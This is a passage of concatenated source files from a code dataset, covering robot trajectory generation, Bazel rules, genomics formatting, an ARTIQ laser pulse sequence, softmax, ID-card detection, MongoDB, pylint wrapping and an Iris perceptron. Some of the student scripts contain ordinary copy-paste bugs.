'proxemics': 0.3, 'betweenobjects': 0.2}):\n\n\t\t# instantiate an environment & trajOpt planner\n\t\tenv, planner = init_env(feat_list, gt_weights, object_centers=obj_center_dict, feat_range=feat_range_dict)\n\t\tself.env = env\n\t\tself.planner = planner\n\t\tself.s_g_exp_trajs = []\n\t\tself.gen = gen\n\n\t\tif goal_poses is not None and len(goals) != len(goal_poses):\n\t\t\tprint(\"Goal pose needs to be either None or same length as len(goals)\")\n\t\t\tassert False\n\n\t\tif combi:\n\t\t\tcombis = [(x, y) for x in range(len(starts)) for y in range(len(goals))]\n\t\t\tself.starts = [starts[tup[0]] for tup in combis]\n\t\t\tself.goals = [goals[tup[1]] for tup in combis]\n\t\t\tif goal_poses is not None:\n\t\t\t\tself.goal_poses = [goal_poses[tup[1]] for tup in combis]\n\t\telse:\n\t\t\tself.starts = starts[:min(len(starts), len(goals))]\n\t\t\tself.goals = goals[:min(len(starts), len(goals))]\n\t\t\tif goal_poses is not None:\n\t\t\t\tself.goal_poses = goal_poses\n\n\t\tif goal_poses is None:\n\t\t\tself.goal_poses = [None for _ in range(len(self.starts))]\n\n\t\tself.T = T\n\t\tself.timestep = timestep\n\n\tdef generate_expert_demos(self, n_per_s_g, std=0.01):\n\t\t\"\"\"\n\t\t\tUse trajopt and some perturbation method to generate near-optimal demonstrations under the GT reward\n\t\t\t----\n\t\t\tInput:\n\t\t\tn_per_s_g\thow many demonstrations per start-goal pair\n\t\t\tstd\t\t\tstandard deviation used to induce near-optimality\n\t\t\"\"\"\n\t\tfor start, goal, goal_pose in zip(self.starts, self.goals, self.goal_poses):\n\t\t\tif self.gen == 'waypt':\n\t\t\t\texpert_demos = generate_Gaus_MaxEnt_trajs(self.planner, self.env, std,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t n_per_s_g, start, goal, goal_pose, self.T, self.timestep)\n\t\t\telif self.gen == 'cost':\n\t\t\t\texpert_demos = generate_cost_perturb_trajs(self.planner, self.env, std,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t n_per_s_g, start, goal, goal_pose, self.T, self.timestep)\n\t\t\t# add for that s_g configuration\n\t\t\tself.s_g_exp_trajs.append(expert_demos)\n\n\tdef generate_rand_start_goal(self, n_trajs, min_dist=0.7):\n\t\t\"\"\"\n\t\t\tGenerates and adds a random set of start-goal pairs that are at least min_dist apart\n\t\t\t----\n\t\t\tInput:\n\t\t\tn_trajs\t\thow many start-goal pairs\n\t\t\tmin_dist\tminimum distance the start-goal pairs should be apart\n\t\t\"\"\"\n\t\ttrajs = []\n\t\tstarts = []\n\t\tgoals = []\n\t\twhile len(trajs) < n_trajs:\n\t\t\t# sample\n\t\t\tstart_sample = np.random.uniform(low=0, high=2 * math.pi, size=7)\n\t\t\tgoal_sample = np.random.uniform(low=0, high=2 * math.pi, size=7)\n\t\t\t# plan\n\t\t\topt_traj = self.planner.replan(start_sample, goal_sample, None, self.T, self.timestep, seed=None)\n\t\t\t# get raw and x,y,z of start and end of the trajectory\n\t\t\traw = map_to_raw_dim(self.env, [opt_traj.waypts])\n\t\t\tdistance = np.linalg.norm(raw[0][0][88:91] - raw[0][-1][88:91])\n\t\t\tif distance > min_dist:\n\t\t\t\ttrajs.append(raw[0])\n\t\t\t\tstarts.append(start_sample)\n\t\t\t\tgoals.append(goal_sample)\n\t\tself.starts = self.starts + starts\n\t\tself.goals = self.goals + goals\n\t\tself.goal_poses = self.goal_poses + [None]*len(starts)\n\n\tdef return_trajs(self):\n\t\t\"\"\"\n\t\t\tReturns the list of lists of expert demonstrations\n\t\t\"\"\"\n\t\treturn self.s_g_exp_trajs\n\n\tdef load_trajs(self, trajectories):\n\t\t\"\"\"\n\t\t\tLoads in a list of lists of expert demonstrations\n\t\t\"\"\"\n\t\tself.s_g_exp_trajs = trajectories\n\n\tdef plot_trajs(self):\n\t\t\"\"\"\n\t\t\tPlot the current set of expert demonstrations in 3D space, color is the z coordinate.\n\t\t\"\"\"\n\t\tall_trajs = []\n\t\tfor s_g_demos in self.s_g_exp_trajs:\n\t\t\thigh_dim_demos = []\n\t\t\tfor angle_traj in s_g_demos:\n\t\t\t\thigh_dim_demos.append(map_to_raw_dim(self.env, [angle_traj])[0])\n\t\t\tall_trajs = all_trajs + high_dim_demos\n\t\tplot_trajs(all_trajs, object_centers=self.env.object_centers, title='Expert Trajectories')","sub_path":"src/MaxEnt_Baseline/Reward_Expert.py","file_name":"Reward_Expert.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"237009072","text":"\"\"\"Re-export of some bazel rules with repository-wide defaults.\"\"\"\n\nload(\"@build_bazel_rules_nodejs//:defs.bzl\", _npm_package = \"npm_package\")\nload(\"@npm_angular_bazel//:index.bzl\", _ng_module = \"ng_module\", _ng_package = \"ng_package\")\nload(\"@npm_bazel_typescript//:index.bzl\", _ts_library = \"ts_library\")\n\nDEFAULT_TSCONFIG = \"//projects:tsconfig.json\"\nDEFAULT_TSCONFIG_TEST = \"//projects:tsconfig-test.json\"\nNG_VERSION = \"^8.0.0\"\nRXJS_VERSION = \"^6.4.0\"\n\ndef ng_module(name, tsconfig = None, entry_point = None, testonly = False, deps = [], module_name = None, bundle_dts = True, **kwargs):\n \"\"\"Default values for ng_module\"\"\"\n deps = deps + [\"@npm//tslib\"]\n if testonly:\n # Match the types[] in //packages:tsconfig-test.json\n deps.append(\"@npm//@types/node\")\n if not tsconfig and testonly:\n tsconfig = DEFAULT_TSCONFIG_TEST\n if not entry_point:\n entry_point = \"public_api.ts\"\n\n _ng_module(\n name = name,\n flat_module_out_file = name,\n tsconfig = tsconfig,\n entry_point = entry_point,\n testonly = testonly,\n bundle_dts = bundle_dts,\n deps = deps,\n module_name = module_name,\n **kwargs\n )","sub_path":"tools/defaults.bzl","file_name":"defaults.bzl","file_ext":"bzl","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"109516223","text":"\"\"\"Format missense constraint scores as vcf.\"\"\"\nimport argparse\nimport toolshed as ts\n\ndef main(path):\n\n tmpl = \"{chrom}\\t{pos}\\t.\\t{ref}\\t{alt}\\t1\\tPASS\\tobs_exp={obs_exp};mis_badness={mis_badness};fitted_score={fitted_score};mpc={MPC}\"\n\n hdr = \"\"\"\\\n##fileformat=VCFv4.1\n##INFO=<ID=obs_exp,Number=1,Type=Float,Description=\"obs_exp\">\n##INFO=<ID=mis_badness,Number=1,Type=Float,Description=\"mis_badness\">\n##INFO=<ID=fitted_score,Number=1,Type=Float,Description=\"Fitted score from our algorithm\">\n##INFO=<ID=mpc,Number=1,Type=Float,Description=\"MPC score (transformed fitted score)\">\n#CHROM POS ID REF ALT QUAL FILTER INFO\"\"\"\n\n for i, line in enumerate(ts.nopen(path)):\n if i == 0:\n print(hdr)\n header = line.rstrip().split(\"\\t\")\n else:\n d = dict(zip(header, line.rstrip().split(\"\\t\")))\n print( tmpl.format(**d) )\n\nif __name__ == \"__main__\":\n p = argparse.ArgumentParser()\n p.add_argument(\"path\")\n a = p.parse_args()\n\n main(a.path)\n","sub_path":"mk_constraint_vcf.py","file_name":"mk_constraint_vcf.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"291034344","text":"#Sorts entries based on activity, then creates tsv for each type\n\nimport csv\n\nBlood_cancer = {}\nBlood_healthy = {}\nBreast_cancer = {}\nBreast_healthy = {}\nLiver_cancer = {}\nLiver_healthy = {}\nPancreas_cancer = {}\nPancreas_Healthy = {}\n\nf = open('Allgenes_activity.tsv', 'r')\nwith open('Allgenes_activity.tsv') as f:\n next(f) #skips headings\n reader = csv.reader(f, delimiter = '\\t')\n for name, gene, bloodc_act, bloodh_act, breastc_act, breasth_act, liverc_act, liverh_act, pancreasc_act, pancreash_act in reader:\n if(bloodc_act == 'on'):\n Blood_cancer[name] = gene\n if(bloodh_act == 'on'):\n Blood_healthy[name] = gene\n if(breastc_act == 'on'):\n Breast_cancer[name] = gene\n if(breastc_act == 'on'):\n Breast_healthy[name] = gene\n if(liverc_act == 'on'):\n Liver_cancer[name] = gene\n if(liverh_act == 'on'):\n Liver_healthy[name] = gene\n if(pancreasc_act == 'on'):\n Pancreas_cancer[name] = gene\n if(pancreash_act == 'on'):\n Pancreas_Healthy[name] = gene\n\nw = csv.writer(open(\"Blood_Cancer.tsv\", \"w\"))\nfor key, val in Blood_cancer.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Blood_Healthy.tsv\", \"w\"))\nfor key, val in Blood_healthy.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Breast_Cancer.tsv\", \"w\"))\nfor key, val in Blood_cancer.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Breast_Healthy.tsv\", \"w\"))\nfor key, val in Breast_healthy.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Liver_Cancer.tsv\", \"w\"))\nfor key, val in Liver_cancer.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Liver_Healthy.tsv\", \"w\"))\nfor key, val in Liver_healthy.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Pancreas_Cancer.tsv\", \"w\"))\nfor key, val in Pancreas_cancer.items():\n w.writerow([key + '\\t' + val])\n\nw = csv.writer(open(\"Pancreas_Healthy.tsv\", \"w\"))\nfor key, val in Pancreas_Healthy.items():\n w.writerow([key + '\\t' + val])\n","sub_path":"Sorting_script.py","file_name":"Sorting_script.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"333881817","text":"from artiq.experiment import *\nimport numpy as np\nfrom artiq.coredevice.ad9910 import PHASE_MODE_TRACKING, PHASE_MODE_ABSOLUTE\n\nclass RabiExcitation:\n freq_729=\"Excitation_729.rabi_excitation_frequency\"\n amp_729=\"Excitation_729.rabi_excitation_amplitude\"\n att_729=\"Excitation_729.rabi_excitation_att\"\n phase_729=\"Excitation_729.rabi_excitation_phase\"\n channel_729=\"Excitation_729.channel_729\"\n duration=\"Excitation_729.rabi_excitation_duration\"\n line_selection=\"Excitation_729.line_selection\"\n sp_amp_729=\"Excitation_729.single_pass_amplitude\"\n sp_att_729=\"Excitation_729.single_pass_att\"\n #detuning = \"RabiFlopping.detuning\"\n \n phase_ref_time=np.int64(-1)\n ramp_has_been_programmed= False # always initialize to False; gets set to True inside setup_ramping\n\n @kernel\n def setup_ramping(self):\n # This function programs the appropriate ramp into the DDS memory.\n #\n # If a PulseSequence wants to use ramping, call setup_ramping() inside \n # its set_subsequence function.\n # To disable ramping for a PulseSequence, the easiest way to do this is\n # comment or remove the call to setup_ramping() in the set_subsequence function.\n r = RabiExcitation \n self.get_729_dds(r.channel_729)\n self.prepare_pulse_with_amplitude_ramp(\n pulse_duration=r.duration,\n ramp_duration=25.0*us,\n dds1_amp=r.amp_729)\n r.ramp_has_been_programmed = True\n print('is ramp set?')\n\n def subsequence(self):\n r = RabiExcitation\n self.get_729_dds(r.channel_729)\n\n if r.ramp_has_been_programmed:\n self.dds_729.set(r.freq_729,\n amplitude=0.,\n ref_time_mu=r.phase_ref_time)\n else:\n self.dds_729.set(r.freq_729,\n amplitude=r.amp_729,\n ref_time_mu=r.phase_ref_time)\n self.dds_729.set_att(r.att_729)\n\n sp_freq_729 = 80*MHz + self.get_offset_frequency(r.channel_729)+ 0*3.21022*MHz\n self.dds_729_SP.set(sp_freq_729, amplitude=r.sp_amp_729, \n phase=r.phase_729 / 360., ref_time_mu=r.phase_ref_time)\n self.dds_729_SP.set_att(r.sp_att_729)\n # print(\"dp: \", r.frereq_729)\n # print(\"sp: \", sp_fq_729)\n if r.ramp_has_been_programmed:\n self.dds_729_SP.sw.on()\n self.execute_pulse_with_amplitude_ramp(\n dds1_att=r.att_729,\n dds1_freq=r.freq_729)\n \n #self.dds_729_SP.sw.off()\n else:\n with parallel:\n self.dds_729.sw.on()\n self.dds_729_SP.sw.on()\n delay(r.duration)\n with parallel:\n self.dds_729.sw.off()\n self.dds_729_SP.sw.off()","sub_path":"sequences/subsequences/rabi_excitation.py","file_name":"rabi_excitation.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"231599638","text":"\nimport numpy as np\n\n\ndef softmax(a):\n c = np.max(a)\n print('softmax c :', c)\n exp_a = np.exp(a-c) # 자연상수 e 지수함수로 변환\n print('exp_a :', exp_a)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\n# e100 은 0 dl 40 개가 넘는 큰값\ndef softmax1(a):\n c = np.max(a)\n print('softmax1 c :', c)\n exp_a = np.exp(a) # overflow 대비책\n print('exp_a :', exp_a)\n\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\na = np.array([0.3, 2.9, 4.0])\n#a= np.array([1010, 1000, 990])\n\ny = softmax(a)\ny1= softmax1(a)\n\n# Softmax 결과의미\n# 1) 확률\n# 2) 각 원소간의 관계 변하지 않음 : exp 함수가 단조 증가함수이기 때문에\n\n\nprint( \"Softmax Result :\", y)\nprint( \"SUM : \" , np.sum(y))\nprint( \"Softmax1 Result :\", y1)\nprint( \"SUM : \" , np.sum(y1))","sub_path":"MLPerceptron/Softmax_test.py","file_name":"Softmax_test.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"277504231","text":"\n# Import packages\nfrom utils import visualization_utils as vis_util\nfrom utils import label_map_util\nimport traceback\nimport argparse\nimport os\nimport cv2\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nimport sys\n\nfrom PIL import Image\n\n\ndef get_images(img_path):\n files = []\n exts = ['jpg', 'png', 'jpeg', 'JPG']\n if os.path.isfile(img_path):\n for ext in exts:\n if img_path.endswith(ext):\n files.append(img_path)\n else:\n for parent, _, filenames in os.walk(img_path):\n for filename in filenames:\n for ext in exts:\n if filename.endswith(ext):\n files.append(os.path.join(parent, filename))\n break\n print('Found {} images'.format(len(files)))\n return files\n\n\ndef argument_parser():\n parser = argparse.ArgumentParser(\n description=\"Detecting and cropping ID card from image\")\n parser.add_argument(\n '--img', help=\"Image file or directory to be processed\", action=\"store\", default=\"test_images\")\n\n parser.add_argument(\n \"--output_dir\", help=\"Output directory for cropped image\", action=\"store\", default=\"output\")\n\n return parser.parse_args()\n # This is needed since the notebook is stored in the object_detection folder.\n\n\nsys.path.append(\"..\")\n\nargs = argument_parser()\n\n# Import utilites\n\n# Name of the directory containing the object detection module we're using\nCWD_PATH = os.getcwd()\n\nMODEL_NAME = 'model'\nIMAGE_NAME = args.img\nIMAGE_EXTS = ['gif', 'jpg', 'png', 'jpeg', 'tiff']\nOUTPUT_DIR = os.path.join(CWD_PATH, args.output_dir)\n\n# Grab path to current working directory\n\n# Path to frozen detection graph .pb file, which contains the model that is used\n# for object detection.\nPATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME, 'frozen_inference_graph.pb')\n\n# Path to label map file\nPATH_TO_LABELS = os.path.join(CWD_PATH, 'data', 'labelmap.pbtxt')\n\n# Path to image\nPATH_TO_IMAGE = os.path.join(CWD_PATH, IMAGE_NAME)\n\n# Number of classes the object detector can identify\nNUM_CLASSES = 1\n\n# Load the label map.\n# Label maps map indices to category names, so that when our convolution\n# network predicts `5`, we know that this corresponds to `king`.\n# Here we use internal utility functions, but anything that returns a\n# dictionary mapping integers to appropriate string labels would be fine\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(\n label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n# Load the Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n sess = tf.Session(graph=detection_graph)\n\n# Define input and output tensors (i.e. data) for the object detection classifier\n\n# Input tensor is the image\nimage_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n\n# Output tensors are the detection boxes, scores, and classes\n# Each box represents a part of the image where a particular object was detected\ndetection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n\n# Each score represents level of confidence for each of the objects.\n# The score is shown on the result image, together with the class label.\ndetection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\ndetection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n\n# Number of objects detected\nnum_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n# Remove output dir\nif os.path.isdir(OUTPUT_DIR):\n shutil.rmtree(OUTPUT_DIR)\nos.makedirs(OUTPUT_DIR)\n\nimages = get_images(PATH_TO_IMAGE)\n\n\nfor image_fn in images:\n try:\n print(f\"running images {image_fn}\")\n # Load image using OpenCV and\n # expand image dimensions to have shape: [1, None, None, 3]\n # i.e. a single-column array, where each item in the column has the pixel RGB value\n image = cv2.imread(image_fn)\n\n image_expanded = np.expand_dims(image, axis=0)\n\n # Perform the actual detection by running the model with the image as input\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_expanded})\n\n # print(\"confidence scores\", scores.shape, boxes.shape, classes.shape)\n # Draw the results of the detection (aka 'visulaize the results')\n image, array_coord, box_to_display_str_map = vis_util.visualize_boxes_and_labels_on_image_array(\n image,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=3,\n min_score_thresh=0.60)\n\n ymin, xmin, ymax, xmax = array_coord\n\n for key, value in box_to_display_str_map.items():\n print(\"box to display str map\", key, value)\n shape = np.shape(image)\n im_width, im_height = shape[1], shape[0]\n (left, right, top, bottom) = (xmin * im_width,\n xmax * im_width, ymin * im_height, ymax * im_height)\n\n # Using Image to crop and save the extracted copied image\n output_path = os.path.join(OUTPUT_DIR, os.path.basename(image_fn))\n print(f\"output dir {output_path}\")\n im = Image.open(image_fn)\n im.crop((left, top, right, bottom)).save(output_path, quality=95)\n except Exception as e:\n traceback.print_exc()\n print(\"exception found for image\", image_fn)\n continue\n","sub_path":"id_card_detection_image.py","file_name":"id_card_detection_image.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"658123","text":"# 加载依赖\nimport pymongo\n\n# 创建连接\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\n# 定位到数据库mongo_python和集合sites\n##use mongo_python\nmp = myclient[\"mongo_python\"]\n\nsites = mp[\"sites\"]\n\nret = sites.update_one({\"alexa\": \"12345\"}, {\"$set\": {\"alexa\": \"10000\"}})\n\nprint(ret)\n","sub_path":"mydb/pymongo_updateone.py","file_name":"pymongo_updateone.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"52050296","text":"\"\"\"\nВыводит список файлов в дереве каталогов с применению рекурсии\n\"\"\"\n\nimport sys, os\n\n\ndef mylister(currdir):\n print('[' + currdir + ']')\n for file in os.listdir(currdir):\n path = os.path.join(currdir, file)\n if not os.path.isdir(path):\n print(path)\n else:\n mylister(path)\n\n\nif __name__ == '__main__':\n mylister(sys.argv[1])","sub_path":"PP4E/System/Filetools/lister_recur.py","file_name":"lister_recur.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"633101270","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport argparse\nimport glob\nimport json\nimport sys\n\nimport sh\n\nfrom analyzers import utils\n\n\nclass PylintAnalyzer(object):\n \"\"\"\n Pylint runner.\n Specify parameters such as project folders, config file for code report tool.\n For example:\n universum_pylint --python-version 2 --files *.py tests/\n ./pylint.py --python-version 2 --files *.py tests/\n Output: json of the found issues in the code.\n \"\"\"\n\n @staticmethod\n def define_arguments():\n parser = argparse.ArgumentParser(description=\"Pylint analyzer\")\n parser.add_argument(\"--files\", dest=\"file_list\", nargs='+', help=\"Python files and Python packages for Pylint.\")\n parser.add_argument(\"--rcfile\", dest=\"rcfile\", help=\"Specify a configuration file.\")\n parser.add_argument(\"--python-version\", dest=\"version\", default=\"3\", choices=[\"2\", \"3\"],\n help=\"Version of Python\")\n utils.add_common_arguments(parser)\n return parser\n\n def __init__(self, settings):\n self.settings = settings\n self.json_file = settings.result_file\n\n def execute(self):\n if not self.settings.file_list:\n sys.stderr.write(\"Please, specify [--files] option. Files could be defined as a single python file,\"\n \" *.py or directories with __init__.py file in the directory.\\n\")\n return 2\n\n issues = []\n files = []\n if not self.settings.rcfile:\n self.settings.rcfile = \"\"\n\n for pattern in self.settings.file_list:\n files.extend(glob.glob(pattern))\n try:\n if self.settings.version == \"3\":\n cmd = sh.Command(\"python3\")\n else:\n cmd = sh.Command(\"python2\")\n issues = cmd(\"-m\", \"pylint\", \"-f\", \"json\", \"--rcfile=\" + self.settings.rcfile, *files).stdout\n except sh.CommandNotFound as e:\n sys.stderr.write(\"No such file or command as '\" + str(e) + \"'. \"\n \"Make sure, that required code report tool is installed.\\n\")\n except Exception as e:\n if e.stderr and not e.stdout:\n sys.stderr.write(e.stderr)\n return 2\n elif e.stdout:\n issues = e.stdout\n\n try:\n issues_loads = []\n loads = []\n if issues:\n loads = json.loads(issues)\n for issue in loads:\n # pylint has its own escape rules for json output of \"message\" values.\n # it uses cgi.escape lib and escapes symbols <>&\n issue[\"message\"] = issue[\"message\"].replace(\"<\", \"<\").replace(\">\", \">\").replace(\"&\", \"&\")\n issues_loads.append(issue)\n utils.analyzers_output(self.json_file, issues_loads)\n if issues_loads:\n return 1\n except ValueError as e:\n sys.stderr.write(e.message)\n sys.stderr.write(\"The following string produced by the pylint launch cannot be parsed as JSON:\\n\")\n sys.stderr.write(issues)\n return 2\n return 0\n\n\ndef form_arguments_for_documentation():\n return PylintAnalyzer.define_arguments()\n\n\ndef main():\n analyzer_namespace = PylintAnalyzer.define_arguments().parse_args()\n analyze = PylintAnalyzer(analyzer_namespace)\n return analyze.execute()\n\n\nif __name__ == \"__main__\":\n exit_code = main()\n sys.exit(exit_code)\n","sub_path":"analyzers/pylint.py","file_name":"pylint.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"383528325","text":"\n\"\"\"\nRuntime: 40 ms, faster than 76.20% of Python3 online submissions for Count and Say.\nMemory Usage: 13 MB, less than 5.11% of Python3 online submissions for Count and Say.\n\"\"\"\nclass Solution:\n def countAndSay(self, n: int) -> str:\n ans = [\"1\"]\n for i in range(n-1):\n ans.append(self.cntsay(ans[-1]))\n return ans[-1]\n\n def cntsay(self, string):\n n = len(string)\n i = 0\n num = 1\n res = \"\"\n while i < n:\n num = 1\n tmp = string[i]\n while i + 1 < n and string[i + 1] == tmp:\n num += 1\n i += 1\n continue\n res += str(num) + tmp\n i += 1\n return res\n\n\na = Solution();\nfor i in range(1, 7):\n b = a.countAndSay(i)\n print(b)","sub_path":"30 Count and Say.py","file_name":"30 Count and Say.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"184825120","text":"from dataclasses import dataclass\r\nfrom task import Task\r\n\r\n@dataclass()\r\nclass Thread:\r\n time_work: int = None\r\n task_type: int = None\r\n idle: bool = True\r\n\r\nclass Processor():\r\n def __init__(self): \r\n self.p = Thread()\r\n \r\n def add_task(self, task: Task):\r\n if self.p.task_type < task.get_type():\r\n l = Task()\r\n l.set_type(task.get_type())\r\n l.set_time(task.get_time())\r\n stack.add_item(l)\r\n self.p.time_work = task.get_time()\r\n self.p.task_type = task.get_type()\r\n elif self.idle_proc():\r\n self.p.time_work = task.get_time()\r\n self.p.task_type = task.get_type()\r\n else:\r\n stack.add_item(task)\r\n\r\n def __task_perform_p(self):\r\n self.p.time_work -= 1\r\n if self.p.time_work <= 0:\r\n self.p.idle = True\r\n self.p_task_type = None\r\n\r\n def __str__(self):\r\n string = \"|proc|type|time|idle|\"\r\n if not self.p.idle:\r\n string += \"\\n|1 |{:<4}|{:<4}|{:<4}|\".format(str(self.p.task_type), str(self.p.time_work), str(self.p.idle))\r\n else:\r\n string += \"\\n|1 |None|None|True|\"\r\n return string\r\n\r\n def work(self):\r\n if not self.p.idle:\r\n self.__task_perform_p()\r\n else:\r\n self.p.idle = True\r\n\r\n def idle_proc(self):\r\n return self.p.idle","sub_path":"processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"300248753","text":"# *Problem 1*\n# Handle the exception thrown by the code below by using try and except blocks. Display a meaningful message.\n#\n# for i in ['a','b','c']:\n# print(i**2)\n# ---------------------------------------------------------------------------\n# TypeError Traceback (most recent call last)\n# <ipython-input-1-908335551eea> in <module>()\n# 1 for i in ['a','b','c']:\n# ----> 2 print i**2\n#\n# TypeError: unsupported operand type(s) for ** or pow(): 'str' and 'int'\n\n# try:\n# for i in ['a','b','c']:\n# print()\n\n# *Problem 2*\n# # Handle the exception thrown by the code below by using try and except blocks. Then use a finally block to print('All Done.')\n\n# x = 5\n# y = 0\n#\n# z = x/y\n# ---------------------------------------------------------------------------\n# ZeroDivisionError Traceback (most recent call last)\n# <ipython-input-2-3effb78be709> in <module>()\n# 2 y = 0\n# 3\n# ----> 4 z = x/y\n#\n# ZeroDivisionError: integer division or modulo by zero\n\n# *Problem 3*\n# Write a function that asks for an integer and prints the square of it. Use a while loop with a try,except, else block to account for incorrect inputs.\n#\n# def ask():\n# *# STUDENTS, YOU FILL OUT THE FUNCTION LIKE WE DID IN CLASS THAT WILL PROMPT AND RESPOND AS FOLLOWS #*\n#\n# Input an integer: crappy_entry\n# An error occurred! Please try again!\n# Input an integer: 2\n# Thank you, you number squared is: 4\n\n\ndef ask():\n\n while True:\n try:\n n = int(input('Input an Integer: '))\n except:\n print ('An error occurred! Please try agian!')\n continue\n else:\n break\n return n\n\nprint('Thank you, your number squared is: ', ask()**2)","sub_path":"exceptionsHomework.py","file_name":"exceptionsHomework.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"515517983","text":"# ID: 2021220699\n# NAME: Eunchan Lee \n# File name: hw02-2.py\n# Platform: Python 3.7 on Windows 10 Spyder4\n# Required Package(s): numpy pandas matplotlib scikit-learn\n\n\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\n\nclass Perceptron:\n \"\"\"\n Perceptron neuron\n \"\"\"\n\n def __init__(self, learning_rate=0.1):\n \"\"\"\n instantiate a new Perceptron\n\n :param learning_rate: coefficient used to tune the model\n response to training data\n \"\"\"\n self.learning_rate = learning_rate\n self._b = 0.0 # y-intercept\n self._w = None # weights assigned to input features\n # count of errors during each iteration\n self.misclassified_samples = []\n\n def fit(self, x: np.array, y: np.array, n_iter=10):\n \"\"\"\n fit the Perceptron model on the training data\n\n :param x: samples to fit the model on\n :param y: labels of the training samples\n :param n_iter: number of training iterations \n \"\"\"\n self._b = 0.0\n self._w = np.zeros(x.shape[1])\n self.misclassified_samples = []\n\n for _ in range(n_iter):\n # counter of the errors during this training iteration\n errors = 0\n for xi, yi in zip(x, y):\n # for each sample compute the update value\n update = self.learning_rate * (yi - self.predict(xi))\n # and apply it to the y-intercept and weights array\n self._b += update\n self._w += update * xi\n errors += int(update != 0.0)\n\n self.misclassified_samples.append(errors)\n\n def f(self, x: np.array) -> float:\n \"\"\"\n compute the output of the neuron\n :param x: input features\n :return: the output of the neuron\n \"\"\"\n return np.dot(x, self._w) + self._b\n\n def predict(self, x: np.array):\n \"\"\"\n convert the output of the neuron to a binary output\n :param x: input features\n :return: 1 if the output for the sample is positive (or zero),\n -1 otherwise\n \"\"\"\n return np.where(self.f(x) >= 0, 1, -1)\n\nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data'\n# download and convert the csv into a DataFrame\ndf = pd.read_csv(url, header=None)\ndf.head()\n\n\n'''\n\ndataset info \n\n-X label\n: 4 features \n\n-Y label \n0~50: Iris-Setosa\n51~100: Iris-Versicolour\n101~150: Iris-Virginica\n\n\nhw2-1.py => Setosa vs Virginica -> 0~50 + 100~150\nhw2-2.py => Versicolour vs Virginica -> 50~100 +100~150\n\n'''\n\n\n# extract the label column\ny = df.iloc[:, 4].values\n# extract features\nx = df.iloc[:, 0:4].values\n\n\n#Concat for Setosa vs Virginica\ny= np.concatenate([y[50:100],y[100:150]])\nx= np.concatenate([x[50:100],x[100:150]])\n\n\n\nfrom sklearn.model_selection import train_test_split\n\n# map the labels to a binary integer value\n# Versicolour(1) or Virginica(-1)\ny = np.where(y == 'Iris-versicolor', 1, -1)\n\n\n# standardization of the input features\nplt.hist(x[:, 0], bins=100)\nplt.title(\"Features before standardization\")\nplt.savefig(\"./before.png\", dpi=300)\nplt.show()\n\n#standardization\nx[:, 0] = (x[:, 0] - x[:, 0].mean()) / x[:, 